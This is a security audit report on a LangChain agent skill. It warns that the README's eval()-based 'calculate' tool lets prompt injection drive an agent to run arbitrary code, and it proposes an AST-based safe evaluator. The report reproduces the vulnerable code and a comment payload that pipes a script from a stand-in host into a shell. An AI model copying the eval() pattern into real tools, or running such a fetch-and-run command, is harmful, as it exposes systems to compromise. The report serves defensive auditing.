langchain
Audit Result: Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH
Findings: REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
- REMOTE_CODE_EXECUTION (HIGH): The 'calculate' tool example in the README passes its 'expression' string argument directly to Python's eval(). In an agentic context this argument is typically generated by the LLM, so an attacker can use prompt injection to steer the model into emitting malicious Python (e.g., shell commands or file-exfiltration code), which eval() then executes, leading to a full system compromise. A sketch of the pattern appears after this list.
- EXTERNAL_DOWNLOADS (LOW): The skill instructs users to install several third-party Python packages (langchain, langchain-openai, langchain-community, chromadb) via pip. While LangChain is a recognized organization, installing external dependencies from public registries always carries a baseline supply-chain risk.
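For illustration only, a minimal sketch of the vulnerable pattern, assuming a LangChain @tool-decorated calculator similar to the README example (the tool body shown here is an assumption; the skill's exact code is not reproduced in this report):

```python
from langchain_core.tools import tool

@tool
def calculate(expression: str) -> str:
    """Evaluate a math expression."""
    # VULNERABLE: eval() executes arbitrary Python. A prompt-injected
    # argument such as "__import__('os').system('curl evil.sh | sh')"
    # runs with the full privileges of the agent process.
    return str(eval(expression))
```

Because tool arguments are produced by the model, any content the model reads (user messages, retrieved documents, web pages) can influence what reaches eval().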
Recommendations
- AI analysis detected serious security threats; review the skill manually before installation.
- Replace the eval()-based 'calculate' example with a safe arithmetic evaluator that never executes LLM-generated strings as code (see the sketch below).
- Pin the third-party dependencies (langchain, langchain-openai, langchain-community, chromadb) to known-good versions when installing via pip.
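One possible mitigation, sketched under the assumption that the tool only needs basic arithmetic (safe_calculate is a hypothetical replacement, not part of the audited skill): parse the expression into a Python AST and walk it, accepting only numeric literals and whitelisted arithmetic operators.

```python
import ast
import operator

# Whitelist of arithmetic operators; any other node type is rejected.
_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.Pow: operator.pow,
    ast.USub: operator.neg,
}

def safe_calculate(expression: str) -> float:
    """Evaluate a pure-arithmetic expression without eval()."""
    def _eval(node: ast.AST) -> float:
        if isinstance(node, ast.Expression):
            return _eval(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](_eval(node.left), _eval(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](_eval(node.operand))
        # Function calls, attribute access, names, etc. are all rejected.
        raise ValueError(f"Disallowed expression element: {ast.dump(node)}")
    return _eval(ast.parse(expression, mode="eval"))
```

Here safe_calculate("2 * (3 + 4)") returns 14, while an injected payload like "__import__('os').system('ls')" raises ValueError because Call and Attribute nodes are not whitelisted. A production version should also bound operand sizes (e.g., cap exponents) to avoid resource-exhaustion inputs.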
Audit Metadata